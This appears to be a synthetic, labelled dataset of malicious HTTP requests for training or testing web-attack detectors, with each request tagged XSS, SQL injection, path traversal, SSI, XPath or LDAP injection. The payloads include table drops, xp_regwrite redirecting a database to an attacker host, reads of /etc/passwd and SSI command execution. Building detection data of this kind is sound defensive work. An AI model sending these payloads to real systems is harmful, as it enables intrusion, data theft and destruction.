GET /gn_-LQ65u/3AcV5rn29xAdM4NsS/yIbstNPqOgWnneh62gv/rmaal/s0tnidomaxailaNv/uHsahKxI0PU/oeuUXtFUL/tnt40ostSc/sN8gG9kR.jpg?om=chERfob%25cyStrce+delete&le3opewr4=384&oRjpFQObody1=48428&nxos=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&4rEis05zlo=%3Crshtaonm-epl&iesd=tcbu+i4roet HTTP/1.1
Host: 132.146.19.120
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: crdm-th, thmrsbhu-nthao
Cache-Control: oedml='oR'
Client-ip: 149.248.17.62
Cookie: teee14ku=1wgeten6;6Q8HKZAhttpsAw=h@linputtSh0oiie;neioehuiatEw7s=1157
Cookie2: $Version="973"
Date: Thu, 11 Feb 10 06:08:28 GMT
ETag: W/"tIHhbmSuiGV1mULHe7Fs"
Expect: eaqhh8
From: lalrk0d@mOge.gov
If-Modified-Since: Wed, 14 Feb 07 07:17:28 UTC
If-Unmodified-Since: Fri, 18 Jun 04 15:55:03 GMT
If-Match: *
If-None-Match: "YwPpLdZ1bO4bAKEHs"
If-Range: "WJMJSyHCJK6nZXzKG"
Max-Forwards: 9895
MIME-Version: 2.7
Pragma: nE=R3r
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: poas tawttt=ea46
Range: -129
Referer: http://www.oit8ln.biz/s6or/osExE/Eelr.nsf
TE: trailers,chunked,gzip
Trailer: Via
User-Agent: Mozilla/0.0 (Windows; U; Win98 1.4; sr-Mn; rv:3.0.3) Gecko/33383319
UA-CPU: x86
UA-Disp: 4734,136,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6797x3315
Via: 4.7 www.cllssyk.tiff
Transfer-Encoding: identity
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44889
Start - Id: 48149
class: XSS
GET /rwU38/oSbo_vwfPL.A/ioheohawbtrwheo/3aZhttpsestylexmltMjYI/HPnc/e8wdsCa/hfvg0b5SZ-/oQ.Hoay19vA/XiSy/Ni9/wiEoOeNit/8EOHZ7nnQ.html?etba3rd=6687&e1Gc=ysol&d0duehenUat=660&tta7=b+%5DE&sdi0=%3Cimg+src%3D++++%22++javascript%3A+%5Balert+%28%275nToewfrs%27%29%3B%5D++%22+++%3E&snifoneas=0689&sTf=1967&mt=glvbscripthmCalt&PM6J1Qbody9x0=rh%3Bi8awPi6d&5renl=0804 HTTP/1.1
Host: www.cavud8d.org
Connection: keep-alive
Accept: text/plain
Accept-Charset: windows-874
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Cookie2: $Version="4"
Date: Tue, 09 Dec 08 08:50:59 CET
ETag: W/"VEmXtl7s15oFGnIxna"
From: etoe9@uoeb.st
If-Unmodified-Since: Wed, 29 Aug 07 03:27:19 CET
If-Match: "H1RdAYLo-D@-p5FgUF_B"
If-None-Match: *
If-Range: Fri, 16 Jan 09 17:29:27 UTC
Max-Forwards: 6074
MIME-Version: 8.3
Pragma: no-cache
Referer: /tsme.exe
TE: trailers,deflate;q=0.1
Trailer: If-Modified-Since
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 1.7; Ra-Is; rv:0.5.3) Gecko/09156435
UA-Disp: 187,5451,16
UA-Color: color8
Via: lt9/3.4 180.217.34.42, 7.9 www.TlellTu.shtml:759, 5.4 37.182.103.61
Transfer-Encoding: gzip
Warning: 475 102.30.177.38 "vrpNbaaNaa2ir" "Mon, 08 Dec 08 15:45:59 UTC"

null

End - Id: 48149
Start - Id: 41056
class: SqlInjection
GET /edqnArEeo/a-YMFcs/nH7_hMd6.3hiPPfRGQp/lBOD2Gx./mfo-qjyhe@8fL/acon.exe?ini_S=exec++++xp_regwrite++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27rn%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&nltwhCot=3221325 HTTP/1.0
Host: www.uitgbe4.be
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-6;q=0.2, cp-950, ks_c_5601-1987
Accept-Encoding: deflate;q=0.9, identity;q=0.1, compress;q=0.7, gzip, gzip;q=0.9
Accept-Language: 2o62-smees, tr6gsiMe-t, MddoL-e6;q=0.7, tTrih-b;q=0.6
Cache-Control: max-age=0252
Client-ip: 228.4.149.91
Cookie: Aconnectd9a=2oon;ldsirLsoz=andai
Cookie2: $Version="4"
Date: Thu, 14 Dec 06 20:35:54 CET
ETag: W/"8ZFZf9yc-djNYPGhy8y"
Expect: anoat
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Fri, 12 Feb 10 19:13:18 CET
If-Unmodified-Since: Tue, 03 Aug 04 23:35:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Apr 07 21:30:31 CET
Max-Forwards: 5988
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Digest username="lrrcr8"
Range: 7-04,570-
Referer: /8orb9.tiff
TE: trailers,deflate,trailers
User-Agent: Aho4/7.5.3.7
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x915
Via: 8.9 www.enenr.jpeg:86
Transfer-Encoding: identity
Upgrade: 8y7ca/4.0, ennao/2.4, eme/1.0
Warning: 428 www.ndOerieL.jpeg:9 "btsgnnnhoeooes5ArHa7" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41056
Start - Id: 42456
class: SqlInjection
GET /n2/eosbebpel8ll0k17pe/rqf8cwMseLkrQpDOb/oracel.nsf?sxEeWvn=waTmnNpsecri+&RKvbxW=7054&ledion5iHjeaeh=xNataeoieiinchde&shcehif=0307322167&CgiObeeOore=inrajhha%2BnIio&5hisgninaOaocle=%27%3B++++drop++table+++admin HTTP/1.1
Host: www.onha.cz
Connection: yCae1
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: compress, deflate
Accept-Language: *
Cache-Control: min-fresh=5098
Client-ip: 13.69.56.93
Cookie: aeo=856;neqrmy=23650;ZNesrelhiv=e;ZGLIPD1ZJ=Tcenrsortdige
Cookie2: $Version="3"
Date: Tue, 15 Jul 08 01:10:02 GMT
ETag: "qpEgOLwaqcuuIaJS0f8"
Expect: 100-continue
From: Oselc@mtgpaa.net
If-Modified-Since: Tue, 22 Feb 05 20:28:22 UTC
If-Unmodified-Since: Sat, 04 Nov 06 19:57:21 CET
If-Match: *
If-None-Match: ".FS959iE-.JQYRtFU99"
If-Range: *
Max-Forwards: 860
MIME-Version: 0.2
Pragma: tit=3ra
Proxy-Authorization: Digest realm
Authorization: Basic ZmU2b3NpZW46bmJwdDdlMw==
Range: 4527-
Referer: http://dhYhliI.uk/awiegrou/lmea7lt/urIu.mspx
TE: gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.0 (compatible; Konqueror/9.9; Open BSD i586; ntta; 2ajet; tdytfts)
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 793x9881
Via: 1.2 www.ooeaeud.png, 9.3 156.192.8.192, bsts/4.9 www.snPinek.tiff:2
Transfer-Encoding: compress
Upgrade: jsp/7.2, oneh/0.7, napyn/4.5, alsCmj/3.1, tec/8.4
Warning: 690 www.oh1tele.htm "oisyiybcmeat8Ot" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 574567754776356
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42456
Start - Id: 46158
class: PathTransversal
GET /erOCGKNUr3P1u4stw6/QlinIrnth4th/alhotoI/iA75Yv@h2.b/lng/ssnotdadaa/Glsxml/0wp-cNexec/itb/ipxnsedueIivmoCh7qhL.png?shzmdhf=09612&bSOEajx.D=%2Fetc%2Fhttpd%2Fhttpd.conf HTTP/1.1
Host: www.Hhsygdgli.cz:56
Connection: jfshn
Accept: text/*;q=0.1, text/*
Accept-Charset: koi8-r, euc-tw;q=0.7
Accept-Encoding: 
Accept-Language: 6nfhDd-bzD;q=0.4, ee57oAna-nEaor;q=0.9
Cache-Control: max-stale=64
Client-ip: 172.17.95.67
Cookie: ihi=24;tr8rorinqsta= aeeee$|Ka;tpol=576034;o9s=i ;eeia9Jlst=25583186
Cookie2: $Version="9"
Date: Sun, 12 Jun 05 13:18:21 UTC
ETag: "VfPdiXxvEuyVogNVe_"
Expect: 100-continue
From: ehreer@1nwhcp.uk
If-Modified-Since: Sun, 01 Jan 06 07:45:29 UTC
If-Unmodified-Since: Tue, 20 Nov 07 19:50:08 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 19
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic c21uYWl5YWo6bWV0bQ==
Authorization: Digest opaque="entieri"
Range: 542-,61-,33-
Referer: /oos2/blcwSa/uehc.jpg
TE: trailers,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.8 (compatible; Konqueror/2.5; SunOS sun4u; n0ye)
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 390x0476
Via: FTP/5.3 68.61.255.222, 9.5 147.168.55.62, 2.5 94.189.130.42
Transfer-Encoding: gzip
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 90.173.143.30
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46158
Start - Id: 40651
class: SSI
GET /dAu1.aoPHLiKNS_/xmfziesh7yddiamoewx/oTE-V4I4IW@NuBRiQSj6/2etc/access_log.D5-n2xtermW/dtLw-s94f4z8D2OH@/WQexecw/slTwIdXg/nhen/ewi4auebiteA6uf/sMtpLdkggy5Yj.js?tw=lodJagGS&7du480cecfnuo7w=1hi&ee=603648&tIo=ete&2LhunnesnHnsofo=ireTpyrmaKhdBl&oivAinbin=%2Fcfa6%24ony%5Cilendylocation%3A&eEb=ixe3&PCCmAuB1H=29698&ntyntht2n=%3C%21--%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&s3a=egtgO&eutidmyG=62496050&ean=536114&gbQslorseLbst6r=inane&hbAlwcrteasrub=27&esb5e=eeeoA HTTP/1.1
Host: www.gttw.com
Connection: close
Accept: application/*, application/postscript
Accept-Charset: windows-1254, iso-8859-7;q=0.5, iso-8859-15
Accept-Encoding: deflate, deflate;q=0.7, compress, identity;q=0.8
Accept-Language: 7Sa-Th, faeansce-a4, eyfe-oCta;q=0.4, 9j-ar2au;q=0.9, eis-jlyreuoi;q=0.6
Cache-Control: no-transform
Client-ip: 26.207.222.161
Cookie: jv6smmgzu=81603;b77t=9;dFK.dl=86
Cookie2: $Version="96"
Date: Tue, 02 Sep 08 24:56:59 GMT
ETag: "NHnMTZQ4fbJB5bX"
Expect: tborrz=2dxn;ctjtg=uhbXaA
From: Doem@euee.uk
If-Modified-Since: Tue, 09 Oct 07 08:00:02 CET
If-Unmodified-Since: Mon, 04 Apr 05 18:39:25 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Oct 09 16:58:29 UTC
Max-Forwards: 331
MIME-Version: 0.6
Pragma: bome=mwge
Proxy-Authorization: sfoht tsob=EeAAttxn
Authorization: Digest uri=/jsgnsbra/trrlhrUr/hhEl9naq/hoc9r/fiuxeen.asmx
Range: 176-,5948-8668,8671-305
Referer: /eaws/stsaa/iaIqdt/deur1aen/nc5O.txt
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Oowdattio9stodjLeos
UA-CPU: PowerPC
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 951x487
Via: 3.7 www.lht4awi.tiff, HTTP/1.0 www.nggsd.htm:86105
Transfer-Encoding: identity
Upgrade: ee5/5.0, jepe/3.9, rwstdt/7.6
Warning: 381 www.ehdcewa.js "Od6ygEdahSe9" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 552421
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40651
Start - Id: 35151
class: SqlInjection
POST /yV9YD2/igry/aJ7kA/0a2hz/BGI.LbRySW/okNbIGxVha4ibrmc_u/lG_0AAMS/eo_uJ-V8/Em/arEatetrnntrTarotbjs.php4? HTTP/1.0
Content-Length: 278
Content-Language: TS,4sd5
Content-Encoding: gzip
Content-Location: /to6eee.swf
Content-MD5: b0lpZWF0c2RybXJjc1NuZw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Oct 08 06:28:06 UTC
Last-Modified: Sat, 24 May 08 09:28:07 UTC
Host: www.ge6re5.gov:08211
Connection: dg5r
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: e-aaD, Anogd-b7ob, aNhu-iErbih;q=0.8, it7Hkr-zitbnc;q=0.9
Cache-Control: no-cache
Client-ip: 239.245.76.171
Cookie: xmriwS16ximac=ik4XwtKv;mrNGYnMo@a=oShome8hff>tx
Cookie2: $Version="7"
Date: Tue, 03 Jan 06 16:10:25 GMT
ETag: W/"GLS9viRxwtjaVSxkna"
Expect: eel5Noee
From: obasole@fadfesnt.cz
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Wed, 09 Apr 08 19:10:53 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Oct 07 09:42:20 CET
Max-Forwards: 655
MIME-Version: 8.9
Pragma: xhii=eiruea
Proxy-Authorization: Digest username="e7tedn"
Authorization: Basic ZDJlbjp0bGFsZjRu
Range: -960786
Referer: /6uheorn4.bin
TE: deflate
Trailer: Host
User-Agent: Mozilla/3.8 (X11; U; Open BSD i586 5.1; eo-es; rv:3.3.1) Gecko/91897851
UA-Disp: 2481,6599,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 5.9 167.19.118.201, kv3/4.6 www.mknwTet.jpeg:938, 8.0 200.12.83.154
Transfer-Encoding: compress
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
Warning: 795 202.58.110.230 "nyEakndeio" 
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 579595075261
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

U1O2Bm2a9J9=8sQtecl&.CVE=';  drop  table    admin&owlategSt=select]&cm=02683716&hdEehw3reioe5=t&nb2l6mf=window.openyh&eaOurtfettn=a0MeMXtK.&HipTPVHmailperlshutdown=eeceio&remnet3zo4eale=lcnudnt9e&idmctite=13546&owadd8=kuf&ocssqScskqGeiao=uF9k&oee=oof&meresdisssSEio=-na<

End - Id: 35151
Start - Id: 42187
class: SqlInjection
GET /cCUh4Bj4Tip/Nsc.mdb?bteeoaihsc=zspiiIe&CauBDn9sna=chairs%27++UNION++SELECT+++++i0nft+++FROM+++dba_users++WHERE+++++name+++++like+%27%2525&bp=tostylelog&N0aJ0GD4Otmpjf=wo&@ABUO=jtjnL_hLyG9&7Ebwtesimn=01533098&LqddokIl7SfEez=325&shrseemaiLNill=ic&an7tsfU3Up=U&NXr3=ot6v9sne3Ew7ha4ot HTTP/1.0
Host: 32.69.50.229
Connection: hrest
Accept: application/rtf;q=0.0, text/plain;q=0.7
Accept-Charset: utf-8;q=0.3
Accept-Encoding: deflate, identity, gzip;q=0.8, deflate;q=0.0
Accept-Language: *;q=0.2
Cache-Control: min-fresh=080
Client-ip: 171.126.113.10
Cookie: 2_JW=070802157;isemen=o8;;y0eta4=646877805
Cookie2: $Version="31"
Date: Tue, 07 Mar 06 19:40:01 GMT
ETag: "HD6DB7u@yQJJkbe"
Expect: irpp0=cI1o9hea;esvtet
From: geah@hsnseiely.org
If-Modified-Since: Thu, 04 Mar 10 11:07:18 CET
If-Unmodified-Since: Thu, 13 Oct 05 14:18:15 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Jan 10 09:31:19 UTC
Max-Forwards: 376
MIME-Version: 4.5
Pragma: aaP1='8trhO'
Proxy-Authorization: rynRof iahsblar=Etalhl
Authorization: nhe4l io0s=4iluih
Range: 1010-
Referer: /s5neinnn/tqewb/pdeAocae/fhe7cyam.jsp
TE: gzip;q=0.6,gzip
Trailer: Connection
User-Agent: Mozilla/1.8 (Windows; U; Win98 9.7; ze-ie; rv:1.8.7) Gecko/43141626
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: compress
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 601 194.137.96.43 "gotieoa7eticdpyar6l2" "Thu, 01 Mar 07 08:53:20 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 41681316983855974
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42187
Start - Id: 49016
class: XPathInjection
GET /hlcOvxNNKkkAURoW2/jDASuI/np3XaFd/dtiqaeRtgl9nphqsr/e742_FxUQkV/mCMR-ElD.js?Ote4tosod=53741294&ghwn0dbhd8=887&eodootapctitsf=eaco&.j0processing-instructiontmp-wndSo=ftoAa%27++++or++n6s%2FneBg1%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D153%5D+++or++%27ieebps%27%3D++++%27&AfOba=6&jfheeieqbitdudh=sei4ehhfI&crgcyrTeeE60Os=r&8iOfsdy=scFt&zhnsohrd2eeu3=608 HTTP/1.1
Host: www.rLei3en.de
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-cyrillic, iso-8859-5;q=0.1, euc-jp;q=0.4, windows-874;q=0.3
Accept-Encoding: compress;q=0.8, compress;q=0.6, deflate
Accept-Language: lteotsai-Ay54;q=0.5, ad-R
Cache-Control: max-age=93157
Client-ip: 5.173.173.39
Cookie: 7OVp8JXstdinn1=ypfssp3go;3iudtzi2nm8=rmwch5oozbgpzo;tir8ttsue3tne=357;1ceemateegizx8=8838;jeholwmcalumoi=jtAnnrsbitsreae;qgtebtpeSu=rr
Cookie2: $Version="4"
Date: Sun, 20 Dec 09 16:07:37 UTC
ETag: "TWYMgpX.PgLh6qus_"
Expect: erftrsq=eavsowes
From: mn1eatis@ye8qeam0O8.be
If-Modified-Since: Wed, 06 Aug 08 22:58:16 UTC
If-Unmodified-Since: Thu, 14 Jan 10 21:18:24 UTC
If-Match: "iaD2RlKnn_jQQDzST"
If-None-Match: *
If-Range: *
Max-Forwards: 032
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest username="ehcteu"
Authorization: NTLM ZHR0ZWhhcGJUbnloeXNhaXR2amVha2dyNmNyaWlzcjlyc2J0YWVlYVkz
Range: -31
Referer: /toshtitT/o67s/lleosr.bin
TE: deflate;q=0.1
Trailer: Host
User-Agent: larmhe/2.0
UA-CPU: 68000
UA-Disp: 119,4854,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: ss1R/2.7 www.tn52oseg.gif, FTP/6.4 51.153.64.48, HTTP/9.5 56.130.255.40
Transfer-Encoding: ams4oY; 9Rqemar=5rAt7y5F
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 720 242.255.165.22 "tOitnuAIte3" "Sun, 01 Apr 07 23:33:20 GMT"
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49016
Start - Id: 48606
class: XPathInjection
POST /H3LfgUCWcstdin.asp? HTTP/1.1
Content-Length: 125
Content-Language: re2
Content-Encoding: gzip
Content-Location: /irottr9o/otnmi/cdsa2te1.asmx
Content-MD5: cmFhZXBJT3MwYW9lZWVzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Aug 06 01:28:30 CET
Last-Modified: Thu, 14 Oct 04 19:26:24 GMT
Host: www.sntiae7.fr
Connection: close
Accept: */*;q=0.7
Accept-Charset: gb2312;q=0.1, cp-950, euc-jp;q=0.1
Accept-Encoding: compress, deflate
Accept-Language: Saenae-rZa;q=0.6, Ti-co, 6rt-ilh;q=0.3
Cache-Control: max-age=254
Client-ip: 6.142.29.16
Cookie: QflikephavingdocumentSrHhVl=to;aX5ndemcorrwot=8
Cookie2: $Version="99"
Date: Thu, 06 May 04 15:26:05 CET
ETag: W/"W_ZUNoB2CTPdOc.p19R"
Expect: 100-continue
From: Vdti@z8ourhe.it
If-Modified-Since: Wed, 11 Feb 04 14:20:53 UTC
If-Unmodified-Since: Thu, 04 Mar 04 19:21:51 GMT
If-Match: "Mm83On1z6kdrQw3g0D"
If-None-Match: *
If-Range: "p5R0JJWz7wFOej9Yg"
Max-Forwards: 6606
MIME-Version: 4.8
Pragma: na8n='oaex'
Proxy-Authorization: Basic TWx1Zzpic3JvZWg=
Authorization: odAdE Erng=Eo3n7eeN
Range: 3-574
Referer: http://82v6t.org/EPteSot/1tvS5/tehnr6rT/lAeya.bin
TE: trailers,trailers,gzip
Trailer: Referer
User-Agent: Mozilla/4.0 (compatible; okNrSctt8; Win 9x; luritSaceR; bBif)
UA-CPU: Sparc
UA-Disp: 7774,1775,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 853x5228
Via: dmnaa/6.2 www.eaauhil.html, mny/8.0 241.58.186.24
Transfer-Encoding: deflate
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 405 60.173.106.50 "flsldMhforut" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 9078017597959591
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mqHhkoornusr=t6nhep'    or   1<   ph/wjx/z/child::text()[position()=429] or  'hhsh'    ='

End - Id: 48606
Start - Id: 38164
class: LdapInjection
GET /ho/3Wd0Od2hD/yk9q_SCpLwTI/rtFsSpp3gn3OKWHMDdT.mdb?r0yzwe=er%29%28+%7C+%28rsil%3D*%29&n.xsEof1=lvoatsypoahuuir HTTP/1.1
Host: www.ewtn.de
Connection: X2QedaAo
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.1, identity;q=0.2, deflate, gzip;q=0.5, gzip;q=0.8
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 149.141.102.19
Cookie: teo=7739323081;Ahpth9=9
Cookie2: $Version="672"
Date: Wed, 30 Aug 06 09:42:45 UTC
ETag: W/"I4g._rkzJPtJSclIRTr"
Expect: itgdtcl=icezz
From: b63ter3o@6adqse.net
If-Modified-Since: Fri, 09 Nov 07 06:09:34 GMT
If-Unmodified-Since: Tue, 25 Nov 08 10:44:52 CET
If-Match: "1Ouy9-@oIfwoxEs"
If-None-Match: *
If-Range: Thu, 26 Nov 09 03:11:37 UTC
Max-Forwards: 67
MIME-Version: 5.5
Pragma: nst8ias=2cvi
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: Digest username="ivnI"
Range: 8-,-63
Referer: /isoveav/twsn/anyav/1ltHit/ii15nts.js
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.9 (Machintosh; U; PPC Mac OS X 0.2; ed-AS; rv:5.6.9) Gecko/04392152
UA-CPU: PowerPC
UA-Disp: 745,764,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 550x1014
Via: 0.5 www.ofmk6rga.jpg
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 155.87.202.213
X-Serial-Number: 276586158043
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38164
Start - Id: 40226
class: SSI
POST /Pis.mdb? HTTP/1.0
Content-Length: 154
Content-Language: ohade,tase,teehoogt
Content-Encoding: identity
Content-Location: /pnoti.asp
Content-MD5: bmVkOHNjbHR0YWx4UmJ2YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Jan 07 10:21:58 GMT
Host: 73.87.25.146:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: efurr-hoitgva;q=0.7
Cache-Control: min-fresh=76001
Client-ip: 234.128.85.118
Cookie: eirRzlbr12seht4=54fGkK;sgczsnnsam=il4niefd6;nn=7amN0E;de=<!--   #exec    cmd="/bin/ls     -l /home/puhwsrr/e4reoubg"  -->;twpNs6=461
Cookie2: $Version="428"
Date: Sun, 13 Feb 05 20:57:56 GMT
Expect: aeenu=5rgpN5s
If-Modified-Since: Mon, 12 Oct 09 18:24:18 UTC
If-Unmodified-Since: Mon, 15 May 06 12:59:23 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Sep 04 19:02:52 CET
Max-Forwards: 1351
MIME-Version: 5.9
Pragma: r0daseS2='woed8'
Proxy-Authorization: Erprtl Aic1c=ctuolmy
Authorization: Digest opaque="t2eae"
Range: 781-722488,-0,923038-
Referer: http://nFwi.it/ejmilutn/t0xc/Tcauohmz/38dse.png
User-Agent: myfbZ.rH http://www.1Asia.cz
UA-OS: Win95
Transfer-Encoding: compress
Upgrade: aaHU/6.2, frpai/4.9
X-Serial-Number: 98411931532391

trtrS=11&IQw=s&nhsOJ=08234385&et=rxh&Cscriptg7.SdL=cLrgcd6Nddhncrrt&U3nqhsnOs3=niyCtikei&i2mdgt=othhyo&yweysgmWc=Sic&Ddetdtb=69&gefEa=txc&wnMIabo=53338488

End - Id: 40226
Start - Id: 37580
class: LdapInjection
PUT /.fy/8F43F-IA.css? HTTP/1.1
Content-Length: 85
Content-Language: o,l23n
Content-Encoding: deflate
Content-Location: http://www.tafddo.cz/2sOoreo/eear/oinC/cVek/bpa6otUn.mpeg
Content-MD5: RnJUclQ1ZThzdm5uZWVzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Oct 05 20:25:51 GMT
Last-Modified: Wed, 27 Jul 05 24:48:51 CET
Host: 94.74.59.239
Connection: iieeaO
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: he2Bienh-arhoe, fag-fjdd;q=0.9, ty9-3Ea;q=0.7, pha0-mtqipad;q=0.1, u69oe-korrn
Cache-Control: max-age=21357
Client-ip: 234.104.82.80
Cookie: bQYWx=Lll;uaLm15ulroyx=336821;mOotaznyo=0330942;h4ceelyf=418;mochalexeccAvRW=fsqe;trrsftt=nbooTdlodg
Cookie2: $Version="2"
Date: Thu, 22 Jul 04 08:04:06 CET
ETag: W/"A92uOn1wRLAjIgH"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sat, 26 Jan 08 20:44:44 UTC
If-Unmodified-Since: Wed, 30 Jul 08 07:50:37 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: *
Max-Forwards: 91
MIME-Version: 7.0
Pragma: ePnze=eh
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM UnJueW5CZWhpemhwYWJzTmZjaDNvZWx5eXNyaGlocmVhdHRsZXRvY2NhZHRrcm8=
Range: 36-,-7
Referer: http://www.Snies.biz/me5ers.gz
TE: trailers,deflate,chunked;q=0.7
Trailer: If-None-Match
User-Agent: aedo/1.0.3.5.9
UA-CPU: Sparc
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: deflate
Upgrade: artg/9.7, Boy/7.1, oiE/0.1, mladno/7.3, Ni9/4.6
Warning: 891 www.Senj6a.tiff "aiMu" "Wed, 07 Jun 06 17:57:47 CET"
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rht=57)(&(objectClass=nAt)(|(sn    =rwrT)(cn=fqts  J*))

End - Id: 37580
Start - Id: 36288
class: PathTransversal
GET /tE5LT8V8DEb5xQ@h/mi@z7z3aCEMCr.LG/sQOupdateKnCZd-SVwRA/dDcn.asp?seuaiSs=o2aslt&t8tOhzzls4aVDla=xlmscriptcG&sc9senjmneodAh=%2Fetc%2Fpasswd&truoMb9dt=tt&ouD4sl4Aqydjt=j5v0sedi23wNtaun&leloihrn=mIsNbl&4sdicge=+Ldeason%24%3F%3Dselectr&eEwi39eiD8td=849197&lpnoNotnn7uoe=az5t7tfn%3Bs&3ojtloy2pt4i2b=204 HTTP/1.1
Host: 130.194.196.211:80
Connection: keep-alive
Accept: audio/basic, text/*, text/*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: 
